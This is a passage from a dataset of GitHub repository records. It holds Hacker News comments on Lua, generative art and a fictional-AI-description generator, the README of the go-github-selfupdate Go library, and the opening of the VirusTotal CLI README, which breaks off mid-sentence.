(\n\t\"log\"\n\t\"os\"\n\n\t\"github.com/thesephist/ink/pkg/ink\"\n)\n\nfunc main() {\n\teng := ink.Engine{}\n\tctx := eng.CreateContext()\n\n\tfile, err := os.Open(\"main.ink\")\n\tdefer file.Close()\n\tif err != nil {\n\t\tlog.Fatal(\"Could not open main.ink for execution\")\n\t}\n\n\tctx.Exec(file)\n\teng.Listeners.Wait()\n}\n```\n\n### IDE support\n\nInk currently has a vim syntax definition file, under `utils/ink.vim`. I'm also hoping to support Monaco / VSCode's language definition format soon with LSP support, but those are on the backburner as I use vim full-time and don't have a personal need for more advanced LSP support.\n", "readme_type": "markdown", "hn_comments": "thanks for sharing this. been casually thinking about how you would implement the Lua interpreter in a FPGA and this is a good starting pointI love that they went from a single-pass interpreter to a byte-code virtual machine, and now like PHP, also has direct access to C & system libraries! Lua has come a long way since it's advent.Lua's simplicity is sometimes it's real selling point. I was just today searching for a small scripting language to implement in a mobile app in .net, where app size is a premium, and it turns out that the smallest useful JavaScript interpreter is at least 3x the size of a Lua interpreter.I do believe that an un-bloated JavaScript language from when it was just invented would be simpler than Lua (as both were designed as \"scripting\" languages, not as main ones), but history didn't go that route :)But... Lua is WEIRD! Weird nomenclature, weird string concatenation operand, 1-based arrays, too clever \"tables\" and \"metatables\" stuff.Timing on this is confusing. Article was written in 2020 about a paper published in 2003 or so about the design of lua 5.0.It's still a really insightful and approachable paper that's worth reading, and it does still help understand the constraints and approach of lua. But the current \"old\" version of the language is 5.2 released in 2011, and there have been a couple major versions after that as well.So some of it may not actually be applicable to using lua now, depending on what your \"now\" looks like.I suppose that's the price for the small core but I do wish Lua had string interpolation.Instead there are like 5 hacky ways to do it: http://lua-users.org/wiki/StringInterpolationThe Lua interpreters, \"upvalues\" sound suspiciously like the results of Tcl's, \"upvar\", can anybody comment on how similar they actually are?I'd love to see upvalues diagrammed as they are represented in memory.It sounds like the stack is perhaps a Stack, where each Frame contains the locals for that stack frame; then a coroutine just needs to keep a pointer to the stack frame it is closing over. (And then, Frame does too, recursively, incase there is more than one scope being closed over.)This would be extremely similar to \u2026 most any other language \u2026 and makes me wonder why Lua gives them such a unique name. It has been hard to really comprehend the Lua spec, when I've tried to understand that facet of it.(I'd also argue that Lua isn't as simple as it is made out to be: primitives behave wildly different from objects, there's the 1-based indexing, multiple-return is pretty much unique to Lua (vs. returning a tuple, which other languages such as Python, Rust, and sort-of JS, go for; I think that's conceptually simpler).)\u00b9and note \"pointer\" here might really be \"GC ref\", to permit these to be GC'd as necessary, as closures can keep stuff alive far longer than normal.> The 5.0 VM is a register machine, which operates on a set of virtual registers that can store and act on the local variables of a function, in addition to the traditional runtime stack.This is a common source of confusion, because the name \"register machine\" makes people think about CPU registers. However, the registers in a register VM are merely slots in the traditional runtime stack. The difference between a stack and register machine has to do with how the bytecode instructions are encoded. In a stack machine, most instructions implicitly pop arguments from and push their results to the top of the stack. The instructions are byte-sized, encoding just the operation name. For example, to add 10+10 LOADK 10\n DUP\n ADD\n\nMeanwhile, in a register machine the instructions can read and write to any slot in the stack. Instructions are larger, because in addition to the operation name they also encode the indexes of the input slots and the index of the output slot. But it's worth it because you need less instructions in total and do less stack shuffling. LOADK 1 10\n ADD 1 1 2Lua 5.0 doesn't have the incremental garbage collector, only the original mark-and-sweep collector.The pdf they based the blog post off of even says the incremental GC is upcoming in 5.1, and you can read through https://www.lua.org/source/5.0/lgc.c.html yourself and see that, unlike the 5.1 version, it only has a single mark list and doesn't use the tri-color scheme.I made some seemingly similar design choices in TXR Lisp (not knowing anything about Lua or its internals).- register based VM with 32 bit instruction words holding 6 bit opcodes.- closures that start on the stack and are moved to the heap.- single pass compiler with no SSA, Lisp straight to code\n - but with additional optimization, informed by control and data flow analysis, done on the VM assembly code.The circles remind me of an enso https://en.wikipedia.org/wiki/Ens%C5%8DNeat site! Minor usability thing -- I might suggest reducing the velocity of the animations, their current speed is a little unsettling.(This should probably have a 2016 tag)I\u2019ve been a long time fan Anders Hoff\u2019s work - it\u2019s well worth it to check the other posts on incovergent.net - quite a few have been covered here on hacker news.Interest also to see how he has moved to Lisp over time, functional programming seems to work well for him for this type of generative art.Lastly - I think it\u2019s refreshing to still see this on the front page : beautiful generative art without DNNs\u2026Cool!Cool article. Reminds me of the flash days .. where working with splines / bezier curves on day-to-day web projects was pretty much the norm. Dynamic motion guides, natural distribution around a shape. Not to mention visual experimentation like this. None of this pre-destination layout engine mumbo jumbo. The whimsical web was where it was at :)Splines are also a great tool to know about when you're trying to approximate smooth curves from sparse data! I reached for splines and martingales a ton when we were developing a patient simulator.Similar to electricity in the 1700's, is AI in its 'parlor trick' phase? Really feels like we're close to the edge with AI where it might start to snowball hard.This is priceless.Bollocks - really, really big bollocks.I'm 52 and wrote quite a few letters by hand on paper and posted them. You do not get to riff about something you have never experienced. This wankery is absolute twaddle.I doubt that whomever created this monstrosity has actually written a letter or a bluey.I've read through the nonsense \"by an army of ethereal code-monkeys\" and it is awful. Who on earth says: \"It is a rare thing, my lord\"? For starters Lord (capital L) and no one I know would even say that.This is not Victorian English. It is not even English English.the elastic container service definition reads like an absolute funding pitch and i love every word of it.Truly a relic of the timeline where not only was Mr. Babbage successful in building his analytical engine, but proceeded to commercialize it as a service.\"EKS (Elastic Kubernetes Service)The tried and trusted method to conjure the dark arts known as \"Kubernetes\" is one of great study and contemplation, for it is not to be taken lightly, this dark path on which you embark. With dedication and perseverance, you may find success where others have failed. Trust in yourself, and the rewards shall be great.\"Can't argue with that!\u201cRoute 53Route 53, the fleet-footed messenger of the gods, delivers your DNS traffic across the Internet with the speed of a Thracian chariot, and at a fraction of the cost.\u201dNever underestimate the bandwidth of a Thracian chariot loaded with parchment barreling down the road.I'd like to see DALL-E making a painting of what GPT-3 would look like if it were a human.> \"an army of ethereal code-monkeys\"this is poeticSomeone with an English degree explain, why did Victorians back in the day think that degree of wordiness was good writing?Congrats on this !Hey OP, I work at HF, feel free to open an issue here https://github.com/huggingface/api-inference-community/issue... or contact api-enterprise@huggingface.co.We've increased resources for you, and we'll check that things run as smoothly as they can.Are these procedural or is there a list of pre-generated \"AI\"s next goes thru?I got this as my third which seemed either prophetic or deterministic.HackerNewsReplyGuy:>from hackernews_response_guy import HackerNewsReplyGuy>model = HackerNewsReplyGuy(1)>model.predict_comments(comments, [u'comment_id'])Very cool!https://github.com/thesephist/modelexiconLooks like it\u2019s powered by GPT-J. My understanding is that GPT-J has comparable performance to OpenAI\u2019s Curie model on many tasks (their second-best variant of GPT-3) but it\u2019s an openly available model that you can run yourself if you have the resources.HackerNewsReplyGuy is a bot for the Hacker News comment section. It consists of an encoder-decoder transformer model that is trained on the whole comment section. It has shown to be useful for spam detection and to reduce comment section noise.Skynet is an end-to-end speech recognition model. It is based on the Inception-v3 architecture and the Speech Transformer (Sphin) speech model. Its speech model was trained on a dataset of 30,000 hours of human speech, as well as speech recordings from the Switchboard corpus and the Fisher corpus. The model achieves 99.34% WER on the Switchboard-1.1 test set.Incomprehensible text followed by broken code. Must the most realistic AI fake generator thing I have witnessed.Seems legit.GPT-WESTWORLD is a large-scale, multilingual language model that generates fluent, realistic sentences from text in any language. It achieves this by incorporating a novel approach to language modeling and incorporating a new type of recurrent network, the Westworld.https://thisaidoesnotexist.com/model/GPT-WESTWORLD/JTdCJTIyZ...It asked me for a model, so I naturally thought of female models and cars, decided upon \"911\" and get:\n\"911 is a dataset for 9/11 related tasks, including predicting the location of the first plane crash, the location of the second plane crash, and the location of the towers.\"Thats not what I had in mind so it still needs a bit of work I think or at least the questions do. ;-)I got:> SpotifAI is a system that uses deep learning to automatically create playlists from user-submitted playlists. Its algorithm has been trained on millions of playlists from Spotify.Which is pretty cool sounding and has a cool name.It's cool project!Got a 504 gateway timeout trying to generate one, but that's probably to be expected when you're on the top of HN.Jesus is a fast and scalable language model trained on the Jesus dataset, which consists of over 4.7 billion words from the Bible. Jesus demonstrates state-of-the-art performance on several language modeling and conversational tasks.If we posted one of these a day on HN - I wonder how long before anyone noticed they weren't real...it would be hypermeta levels of satisfying if indeed these results are maybe 500 or so human-written precanned responses.Got a good laugh from this one.> GPT-NSFW is an N-gram model that was created using the same WebText dataset as GPT-2, but that is designed to generate NSFW text. The NSFW version of GPT-2 has shown great promise in generating NSFW text.https://thisaidoesnotexist.com/model/GPT-NSFW/JTdCJTIyZGVmbi...Clicked into it, didn't read the description, and got an AI-based project that could perfectly hedge my fixed income portfolio. I won't lie, got a bit excited and then I realized what site I'd clicked on.Very nifty! Is this your site?As someone who has trained around 60 GPT-2s, this is damn impressive work. It\u2019s very hard to get consistent code quality when the training corpus is so small (as this one undoubtedly was).https://thisaidoesnotexist.com/model/MozartNet/JTdCJTIyZGVmb...The url scheme is interesting. I wonder what it base64 decodes to. If I were at a computer I\u2019d check. It might be a complete representation of the inputs to the model, which is then cached. Which implies you might be able to fiddle with it to get specific outputs.This one gave me a good chuckle.>TinderSwindler is a system developed by Facebook to analyze mobile phone location data in order to catch potential cheaters. TinderSwindler leverages Al technology to automatically identify relationships between people based on their movements over a period of time. TinderSwindler was released by Facebook in January 2018.All this talk about Gateway Timeouts made me curious:> Gateway Timeout is a deep learning-based anomaly detection system. It detects anomalies by learning the probability distribution of normal traffic and comparing it to traffic that does not match the normal distribution.Some funny responses i've got:Portal 3 spoilers:GLaDOS is a character voiced by Ellen McLain that serves as the main antagonist of the Portal franchise. GLaDOS was originally a self-aware A.I. in the form of a computer that was built as a personality core for the Aperture Science Laboratories' mainframe. She is the main antagonist in the first game, Portal, and serves as a narrator for the second game, Portal 2. She is also the main antagonist of the third game, Portal 3, where she becomes the leader of the Aperture Science Resistance.A semi-successful attempt at recursion:thisaidoesnotexist is a tool that is able to generate fake images with high resemblance to real ones. This is achieved by using the GAN to generate the image, and then replacing the generated image with the real one.I got Timelord:Timelord is a self-supervised temporal model that learns a shared embedding of timestamped data. It is used as a pre-processing step in self-supervised training for a number of tasks such as semantic video segmentation and video captioning.Now I want a library with that name[1] Link to its description: \nhttps://thisaidoesnotexist.com/model/Timelord/JTdCJTIyZGVmbi...this gave me weird dream last night;) pretty surrealI iterally dreamed of some none nonsensical problem and in the dream I was like wait a second I have seen the nonsensical solution before (which happened to be one of the AI that doesn't exist)I have got UltraTLDR and Skynet.My favorite name of the dozen or so projects i saw: SpotifAIi love thisLooks like we're currently getting a pre-defined set of 38 models: https://raw.githubusercontent.com/thesephist/modelexicon/mai...Hey Linus, two questions:Is it tricky or frustrating being named Linus and being in software?Do you get asked this a lot?On FF, I get a blank page. Given the domain name, I thought it was a joke until I came here and read the comments.> AutoProfit is a reinforcement learning model that trains itself on a simulated trading environment. It is able to trade on its own and generate its own trading signals, outperforming a portfolio of human traders and making the most out of available information. AutoProfit is a model for trading stock, cryptocurrencies, and commodities in real time, generating trading strategies for itself. It uses an iterative training process, and has been tested on over 50 trading strategies.Cool.This AI Does Not Exist (IDEA) is an AI system that can answer questions about itself. The system was created by the research team at the University of Cambridge and is based on the concept of an \"AI mirror\", which can be trained to look at itself and answer questions about its own existence.You know now that I made friends with a homeless beggar I have no trouble making friends with a bot. Why not? Has some humanity breathed into them, like a book for instance, a book can be your friend. A kind old family friend who let me stay with her told me a long time ago just that when talking about a chest full of books, these books are my friends.> The most widely used and influential notation is writing systems for natural languages. ... When we write ideas down, we make those ideas durable and reliable through time.totally anthropocentric perspective, exactly what you'd expect from a human author writing for humans. the most widely used and influential notation is stigmergy, a system used extensively by social insects for encoding behavioral instructions into the landscape by marking it with pheromonesI was fascinated by D. Englebart's \"Augmenting the Human Intellect\" and the whole Intelligence Amplification research direction (made always more sense to me than Artificial Intellignce).This is going off on a tangent, yet I recently find myself interested in embodied knowledge (skills), things you cannot learn from notation.It started for me with Rekimoto's possessed Hand:\nhttps://www.youtube.com/watch?v=9XBoZyfB8hYThe Proprioceptive Interaction paper from Pedro: (all of his work is awesome):\nhttp://plopes.org/Haptic perception work by Paul:\nhttps://fkeel.github.io/There are some awesome researchers (actually collaborators) in this space:\nhttp://embodiedmedia.org/\nhttps://www.sonycsl.co.jp/member/tokyo/198/I believe more and more intelligence amplification technology will have a substantial haptic/proprioceptive component.Playing recently a lot with soft actuators :)\nhttp://kaikunze.de/papers/pdf/goto2020accelerating.pdfI think the notation that impresses me the most is not actually a notation at all, it's a UI and workflow.FreeCAD manages to take a very difficult thing, working in 3D space, and move most of the work onto the CPU rather than you.Through constraints they eliminate the need for precision aligning stuff with the mouse, but more than that, it's essentially working with a compressed set of properties rather than the 3D objects themselves.It changes everything. It's true computer aided design, not just computer aided recording of a design already in your head.With OpenSCAD or direct modeling, there's a lot more need to know what you're doing before you start.The downside is that it does sort of limit your thinking to the shapes that aren't too hard to make. But in return it makes 3D space accessible to the amateur, not just those with hundreds of hours to try to learn to draw, or the talent to mentally visualize parts with the kind of accuracy needed for mechanical design.Though I mention some of these in the post, I think it might be worth calling attention to some of my favorite works in this general space of interactive documents/dynamic notation/interfaces for thinking in the software medium.- Ken Iverson's \"Notation as a tool of thought\"- Bret Victor's works around the general topic of \"Dynamic medium\"- D. Englebart's \"Augmenting Human Intellect\" \u2014 in particular, his thoughts on symbolic manipulation technologies and the cascading effects of improving notation (though he doesn't use the word \"notation\" very much, the ideas are there)- Ted Chiang's many fiction works exploring topics around language and notation: \"Truth of Fact, Truth of Feeling\", \"Story of Your Life\"- \"Instrumental interaction\" by Michael Beaudouin-Lafon, which is about software interfaces, but also provides a good conceptual framework for thinking about notation as interfaces as well.Adding more to the musical notation, the appearance of the first prototype of modern linear notation by Guido d\u2019Arezzo was an important step ahead if comparing to the more obsolete, so-called neumes notation, which was used in Europe at the beginning of the 9th century. A new system of notation included a special mnemotechnical system, called Guido\u2019s hand, where the order of sound sequence was defined by knuckles and fingertips. Ir was also the primary step to liquidation gap between theory and practice of that time. http://literati.newhampton.org/blog/2017/11/29/three-importa...A personal favorite example of notation improving my ability to think is Named Tensor Notation, which has gotten some attention in the machine learning community.https://namedtensor.github.io/Some diehard mathematicians have said it's a crime against linear algebra, but I think it's much more useful for talking about things like neural networks than conventional notation.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rhysd/go-github-selfupdate", "link": "https://github.com/rhysd/go-github-selfupdate", "tags": ["golang", "go", "github", "update", "selfupdate", "cli"], "stars": 511, "description": "Binary self-update mechanism for Go commands using GitHub", "lang": "Go", "repo_lang": "", "readme": "Self-Update Mechanism for Go Commands Using GitHub\n==================================================\n\n[![GoDoc Badge][]][GoDoc]\n[![TravisCI Status][]][TravisCI]\n[![AppVeyor Status][]][AppVeyor]\n[![Codecov Status][]][Codecov]\n\n[go-github-selfupdate][] is a Go library to provide a self-update mechanism to command line tools.\n\nGo does not provide a way to install/update the stable version of tools. By default, Go command line\ntools are updated:\n\n1. using `go get -u`, but it is not stable because HEAD of the repository is built\n2. using system's package manager, but it is harder to release because of depending on the platform\n3. downloading executables from GitHub release page, but it requires users to download and put it in an executable path manually\n\n[go-github-selfupdate][] resolves the problem of 3 by detecting the latest release, downloading it and\nputting it in `$GOPATH/bin` automatically.\n\n[go-github-selfupdate][] detects the information of the latest release via [GitHub Releases API][] and\nchecks the current version. If a newer version than itself is detected, it downloads the released binary from\nGitHub and replaces itself.\n\n- Automatically detect the latest version of released binary on GitHub\n- Retrieve the proper binary for the OS and arch where the binary is running\n- Update the binary with rollback support on failure\n- Tested on Linux, macOS and Windows (using Travis CI and AppVeyor)\n- Many archive and compression formats are supported (zip, tar, gzip, xzip)\n- Support private repositories\n- Support [GitHub Enterprise][]\n- Support hash, signature validation (thanks to [@tobiaskohlbau](https://github.com/tobiaskohlbau))\n\nAnd small wrapper CLIs are provided:\n\n- [detect-latest-release](./cmd/detect-latest-release): Detect the latest release of given GitHub repository from command line\n- [go-get-release](./cmd/go-get-release): Like `go get`, but install a release binary from GitHub instead\n\n[Slide at GoCon 2018 Spring (Japanese)](https://speakerdeck.com/rhysd/go-selfupdate-github-de-turuwozi-ji-atupudetosuru)\n\n[go-github-selfupdate]: https://github.com/rhysd/go-github-selfupdate\n[GitHub Releases API]: https://developer.github.com/v3/repos/releases/\n\n\n\n## Try Out Example\n\nExample to understand what this library does is prepared as [CLI](./cmd/selfupdate-example/main.go).\n\nInstall it at first.\n\n```\n$ go get -u github.com/rhysd/go-github-selfupdate/cmd/selfupdate-example\n```\n\nAnd check the version by `-version`. `-help` flag is also available to know all flags.\n\n```\n$ selfupdate-example -version\n```\n\nIt should show `v1.2.3`.\n\nThen run `-selfupdate`\n\n```\n$ selfupdate-example -selfupdate\n```\n\nIt should replace itself and finally show a message containing release notes.\n\nPlease check the binary version is updated to `v1.2.4` with `-version`. The binary is up-to-date.\nSo running `-selfupdate` again only shows 'Current binary is the latest version'.\n\n### Real World Examples\n\nFollowing tools are using this library.\n\n- [dot-github](https://github.com/rhysd/dot-github)\n- [dotfiles](https://github.com/rhysd/dotfiles)\n- [github-clone-all](https://github.com/rhysd/github-clone-all)\n- [pythonbrew](https://github.com/utahta/pythonbrew)\n- [akashic](https://github.com/cowlick/akashic)\n- [butler](https://github.com/netzkern/butler)\n\n\n\n## Usage\n\n### Code Usage\n\nIt provides `selfupdate` package.\n\n- `selfupdate.UpdateSelf()`: Detect the latest version of itself and run self update.\n- `selfupdate.UpdateCommand()`: Detect the latest version of given repository and update given command.\n- `selfupdate.DetectLatest()`: Detect the latest version of given repository.\n- `selfupdate.DetectVersion()`: Detect the user defined version of given repository.\n- `selfupdate.UpdateTo()`: Update given command to the binary hosted on given URL.\n- `selfupdate.Updater`: Context manager of self-update process. If you want to customize some behavior\n of self-update (e.g. specify API token, use GitHub Enterprise, ...), please make an instance of\n `Updater` and use its methods.\n\nFollowing is the easiest way to use this package.\n\n```go\nimport (\n \"log\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n)\n\nconst version = \"1.2.3\"\n\nfunc doSelfUpdate() {\n v := semver.MustParse(version)\n latest, err := selfupdate.UpdateSelf(v, \"myname/myrepo\")\n if err != nil {\n log.Println(\"Binary update failed:\", err)\n return\n }\n if latest.Version.Equals(v) {\n // latest version is the same as current version. It means current binary is up to date.\n log.Println(\"Current binary is the latest version\", version)\n } else {\n log.Println(\"Successfully updated to version\", latest.Version)\n log.Println(\"Release note:\\n\", latest.ReleaseNotes)\n }\n}\n```\n\nFollowing asks user to update or not.\n\n```go\nimport (\n \"bufio\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n \"log\"\n \"os\"\n)\n\nconst version = \"1.2.3\"\n\nfunc confirmAndSelfUpdate() {\n latest, found, err := selfupdate.DetectLatest(\"owner/repo\")\n if err != nil {\n log.Println(\"Error occurred while detecting version:\", err)\n return\n }\n\n v := semver.MustParse(version)\n if !found || latest.Version.LTE(v) {\n log.Println(\"Current version is the latest\")\n return\n }\n\n fmt.Print(\"Do you want to update to\", latest.Version, \"? (y/n): \")\n input, err := bufio.NewReader(os.Stdin).ReadString('\\n')\n if err != nil || (input != \"y\\n\" && input != \"n\\n\") {\n log.Println(\"Invalid input\")\n return\n }\n if input == \"n\\n\" {\n return\n }\n\n exe, err := os.Executable()\n if err != nil {\n log.Println(\"Could not locate executable path\")\n return\n }\n if err := selfupdate.UpdateTo(latest.AssetURL, exe); err != nil {\n log.Println(\"Error occurred while updating binary:\", err)\n return\n }\n log.Println(\"Successfully updated to version\", latest.Version)\n}\n```\n\nIf GitHub API token is set to `[token]` section in `gitconfig` or `$GITHUB_TOKEN` environment variable,\nthis library will use it to call GitHub REST API. It's useful when reaching rate limits or when using\nthis library with private repositories.\n\nNote that `os.Args[0]` is not available since it does not provide a full path to executable. Instead,\nplease use `os.Executable()`.\n\nPlease see [the documentation page][GoDoc] for more detail.\n\nThis library should work with [GitHub Enterprise][]. To configure API base URL, please setup `Updater`\ninstance and use its methods instead (actually all functions above are just a shortcuts of methods of an\n`Updater` instance).\n\nFollowing is an example of usage with GitHub Enterprise.\n\n```go\nimport (\n \"log\"\n \"github.com/blang/semver\"\n \"github.com/rhysd/go-github-selfupdate/selfupdate\"\n)\n\nconst version = \"1.2.3\"\n\nfunc doSelfUpdate(token string) {\n v := semver.MustParse(version)\n up, err := selfupdate.NewUpdater(selfupdate.Config{\n APIToken: token,\n EnterpriseBaseURL: \"https://github.your.company.com/api/v3\",\n })\n latest, err := up.UpdateSelf(v, \"myname/myrepo\")\n if err != nil {\n log.Println(\"Binary update failed:\", err)\n return\n }\n if latest.Version.Equals(v) {\n // latest version is the same as current version. It means current binary is up to date.\n log.Println(\"Current binary is the latest version\", version)\n } else {\n log.Println(\"Successfully updated to version\", latest.Version)\n log.Println(\"Release note:\\n\", latest.ReleaseNotes)\n }\n}\n```\n\nIf `APIToken` field is not given, it tries to retrieve API token from `[token]` section of `.gitconfig`\nor `$GITHUB_TOKEN` environment variable. If no token is found, it raises an error because GitHub Enterprise\nAPI does not work without authentication.\n\nIf your GitHub Enterprise instance's upload URL is different from the base URL, please also set the `EnterpriseUploadURL`\nfield.\n\n\n### Naming Rules of Released Binaries\n\ngo-github-selfupdate assumes that released binaries are put for each combination of platforms and archs.\nBinaries for each platform can be easily built using tools like [gox][]\n\nYou need to put the binaries with the following format.\n\n```\n{cmd}_{goos}_{goarch}{.ext}\n```\n\n`{cmd}` is a name of command.\n`{goos}` and `{goarch}` are the platform and the arch type of the binary.\n`{.ext}` is a file extension. go-github-selfupdate supports `.zip`, `.gzip`, `.tar.gz` and `.tar.xz`.\nYou can also use blank and it means binary is not compressed.\n\nIf you compress binary, uncompressed directory or file must contain the executable named `{cmd}`.\n\nAnd you can also use `-` for separator instead of `_` if you like.\n\nFor example, if your command name is `foo-bar`, one of followings is expected to be put in release\npage on GitHub as binary for platform `linux` and arch `amd64`.\n\n- `foo-bar_linux_amd64` (executable)\n- `foo-bar_linux_amd64.zip` (zip file)\n- `foo-bar_linux_amd64.tar.gz` (tar file)\n- `foo-bar_linux_amd64.xz` (xzip file)\n- `foo-bar-linux-amd64.tar.gz` (`-` is also ok for separator)\n\nIf you compress and/or archive your release asset, it must contain an executable named one of followings:\n\n- `foo-bar` (only command name)\n- `foo-bar_linux_amd64` (full name)\n- `foo-bar-linux-amd64` (`-` is also ok for separator)\n\nTo archive the executable directly on Windows, `.exe` can be added before file extension like\n`foo-bar_windows_amd64.exe.zip`.\n\n[gox]: https://github.com/mitchellh/gox\n\n\n### Naming Rules of Versions (=Git Tags)\n\ngo-github-selfupdate searches binaries' versions via Git tag names (not a release title).\nWhen your tool's version is `1.2.3`, you should use the version number for tag of the Git\nrepository (i.e. `1.2.3` or `v1.2.3`).\n\nThis library assumes you adopt [semantic versioning][]. It is necessary for comparing versions\nsystematically.\n\nPrefix before version number `\\d+\\.\\d+\\.\\d+` is automatically omitted. For example, `ver1.2.3` or\n`release-1.2.3` are also ok.\n\nTags which don't contain a version number are ignored (i.e. `nightly`). And releases marked as `pre-release`\nare also ignored.\n\n[semantic versioning]: https://semver.org/\n\n\n### Structure of Releases\n\nIn summary, structure of releases on GitHub looks like:\n\n- `v1.2.0`\n - `foo-bar-linux-amd64.tar.gz`\n - `foo-bar-linux-386.tar.gz`\n - `foo-bar-darwin-amd64.tar.gz`\n - `foo-bar-windows-amd64.zip`\n - ... (Other binaries for v1.2.0)\n- `v1.1.3`\n - `foo-bar-linux-amd64.tar.gz`\n - `foo-bar-linux-386.tar.gz`\n - `foo-bar-darwin-amd64.tar.gz`\n - `foo-bar-windows-amd64.zip`\n - ... (Other binaries for v1.1.3)\n- ... (older versions)\n\n\n### Hash or Signature Validation\n\ngo-github-selfupdate supports hash or signature validatiom of the downloaded files. It comes\nwith support for sha256 hashes or ECDSA signatures. In addition to internal functions the\nuser can implement the `Validator` interface for own validation mechanisms.\n\n```go\n// Validator represents an interface which enables additional validation of releases.\ntype Validator interface {\n\t// Validate validates release bytes against an additional asset bytes.\n\t// See SHA2Validator or ECDSAValidator for more information.\n\tValidate(release, asset []byte) error\n\t// Suffix describes the additional file ending which is used for finding the\n\t// additional asset.\n\tSuffix() string\n}\n```\n\n#### SHA256\n\nTo verify the integrity by SHA256 generate a hash sum and save it within a file which has the\nsame naming as original file with the suffix `.sha256`.\nFor e.g. use sha256sum, the file `selfupdate/testdata/foo.zip.sha256` is generated with:\n```shell\nsha256sum foo.zip > foo.zip.sha256\n```\n\n#### ECDSA\nTo verify the signature by ECDSA generate a signature and save it within a file which has the\nsame naming as original file with the suffix `.sig`.\nFor e.g. use openssl, the file `selfupdate/testdata/foo.zip.sig` is generated with:\n```shell\nopenssl dgst -sha256 -sign Test.pem -out foo.zip.sig foo.zip\n```\n\ngo-github-selfupdate makes use of go internal crypto package. Therefore the used private key\nhas to be compatbile with FIPS 186-3.\n\n\n\n## Development\n\n### Running tests\n\nAll library sources are put in `/selfupdate` directory. So you can run tests as following\nat the top of the repository:\n\n```\n$ go test -v ./selfupdate\n```\n\nSome tests are not run without setting a GitHub API token because they call GitHub API too many times.\nTo run them, please generate an API token and set it to an environment variable.\n\n```\n$ export GITHUB_TOKEN=\"{token generated by you}\"\n$ go test -v ./selfupdate\n```\n\nThe above command runs almost all tests and it's enough to check the behavior before creating a pull request.\nSome tests are still not tested because they depend on my personal API access token, though; for repositories\non GitHub Enterprise or private repositories on GitHub.\n\n\n### Debugging\n\nThis library can output logs for debugging. By default, logger is disabled.\nYou can enable the logger by the following and can know the details of the self update.\n\n```go\nselfupdate.EnableLog()\n```\n\n\n### CI\n\nTests run on CIs (Travis CI, Appveyor) are run with the token I generated. However, because of security\nreasons, it is not used for the tests for pull requests. In the tests, a GitHub API token is not set and\nAPI rate limit is often exceeding. So please ignore the test failures on creating a pull request.\n\n\n\n## Dependencies\n\nThis library utilizes\n- [go-github][] to retrieve the information of releases\n- [go-update][] to replace current binary\n- [semver][] to compare versions\n- [xz][] to support XZ compress format\n\n> Copyright (c) 2013 The go-github AUTHORS. All rights reserved.\n\n> Copyright 2015 Alan Shreve\n\n> Copyright (c) 2014 Benedikt Lang \n\n> Copyright (c) 2014-2016 Ulrich Kunitz\n\n[go-github]: https://github.com/google/go-github\n[go-update]: https://github.com/inconshreveable/go-update\n[semver]: https://github.com/blang/semver\n[xz]: https://github.com/ulikunitz/xz\n\n\n\n## What is different from [tj/go-update][]?\n\nThis library's goal is the same as tj/go-update, but it's different in following points.\n\ntj/go-update:\n\n- does not support Windows\n- only allows `v` for version prefix\n- does not ignore pre-release\n- has [only a few tests](https://github.com/tj/go-update/blob/master/update_test.go)\n- supports Apex store for putting releases\n\n[tj/go-update]: https://github.com/tj/go-update\n\n\n\n## License\n\nDistributed under the [MIT License](LICENSE)\n\n[GoDoc Badge]: https://godoc.org/github.com/rhysd/go-github-selfupdate/selfupdate?status.svg\n[GoDoc]: https://godoc.org/github.com/rhysd/go-github-selfupdate/selfupdate\n[TravisCI Status]: https://travis-ci.org/rhysd/go-github-selfupdate.svg?branch=master\n[TravisCI]: https://travis-ci.org/rhysd/go-github-selfupdate\n[AppVeyor Status]: https://ci.appveyor.com/api/projects/status/1tpyd9q9tw3ime5u/branch/master?svg=true\n[AppVeyor]: https://ci.appveyor.com/project/rhysd/go-github-selfupdate/branch/master\n[Codecov Status]: https://codecov.io/gh/rhysd/go-github-selfupdate/branch/master/graph/badge.svg\n[Codecov]: https://codecov.io/gh/rhysd/go-github-selfupdate\n[GitHub Enterprise]: https://enterprise.github.com/home\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "VirusTotal/vt-cli", "link": "https://github.com/VirusTotal/vt-cli", "tags": [], "stars": 511, "description": "VirusTotal Command Line Interface", "lang": "Go", "repo_lang": "", "readme": "# VirusTotal CLI\n\nWelcome to the VirusTotal CLI, a tool designed for those who love both VirusTotal and command-line interfaces. With this tool you can do everything you'd normally do using the VirusTotal's web page, including:\n\n* Retrieve information about a [file](doc/vt_file.md), [URL](doc/vt_url.md), [domain name](doc/vt_domain.md), [IP address](doc/vt_ip.md), etc.\n* [Search](doc/vt_search.md) for files and URLs using VirusTotal Intelligence query syntax.\n* [Download files](doc/vt_download.md).\n* [Manage your LiveHunt YARA rules](doc/vt_hunting_ruleset.md).\n* [Launch Retrohunt jobs](doc/vt_retrohunt_start.md) and [get their results](doc/vt_retrohunt_matches.md).\n\nAnd much [more](doc/vt.md)...\n\n## See it in action\n\n[![asciicast](https://asciinema.org/a/179696.png)](https://asciinema.org/a/179696)\n\n## Getting started\n\nAs this tool use the [VirusTotal API](https://developers.virustotal.com/v3.0/reference) under the hood, you will need a VirusTotal API key. By [signing-up](https://www.virustotal.com/#/join-us) with VirusTotal you will receive a free API key, however free API keys have a limited amount of requests per minute, and they don't have access to some premium features like searches and file downloads. If you are interested in using those premium features please [contact us](https://support.virustotal.com/hc/en-us/requests/new).\n\n### Installing the tool\n\nFor installing the tool you can download one the [pre-compiled binaries](https://github.com/VirusTotal/vt-cli/releases) we offer for Windows, Linux and Mac OS X, or alternatively you can compile it yourself from source code. For compiling the program you'll need Go 1.14.x or higher installed in your system and type the following commands:\n\n```\n$ git clone https://github.com/VirusTotal/vt-cli\n$ cd vt-cli\n$ make install\n```\n\n### A note on Window's console\n\nIf you plan to use vt-cli in Windows on a regular basis we highly recommend you to avoid the standard Windows's console and use [Cygwin](https://www.cygwin.com/) instead. The Windows's console is *very* slow when printing large amounts of text (as vt-cli usually does) while Cygwin performs much better. Additionally, you can benefit of Cygwin's support for command auto-completion, a handy feature that Window's console doesn't offer. In order to take advantage of auto-completion make sure to include the `bash-completion` package while installing Cygwin.\n\n\n### Configuring your API key\n\nOnce you have installed the vt-cli tool you may want to configure it with your API key. This is not strictly necessary, as you can provide your API key every time you invoke the tool by 